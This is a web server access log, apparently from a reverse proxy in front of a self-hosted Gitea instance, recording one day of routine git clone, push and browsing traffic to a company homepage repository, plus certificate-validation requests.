[Length 20247] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:09:57:39 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:09:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:09:57:40 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:10:12:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11616] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:13 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:14 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:14 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:10:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405176] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:10:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 40] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:10:44:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 16.144.17.106] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5" "-" -[16/Feb/2026:11:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 54.162.53.4] [Length 5664] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" -[16/Feb/2026:12:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 11615] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:12:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 211.234.204.1] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:12:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 211.234.204.1] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:12:04:00 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:04:00 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:04:57 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:04:57 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:05:06 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:05:07 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:12:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11625] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20221] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 222.117.41.51] [Length 141938] [Gzip 14.50] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 222.117.41.51] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17353] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets" [Client 222.117.41.51] [Length 13949] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets" [Client 222.117.41.51] [Length 26048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images" [Client 222.117.41.51] [Length 14167] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fimages" [Client 222.117.41.51] [Length 31421] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js" [Client 222.117.41.51] [Length 13140] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:12:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" [Client 222.117.41.51] [Length 27478] [Gzip 5.77] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fi18n.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:12:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:13:03:09 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:13:03:09 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[16/Feb/2026:13:03:10 +0000] - - 499 - HEAD https git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://git.hanmocnn.co.kr" -[16/Feb/2026:13:04:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11625] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[16/Feb/2026:13:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 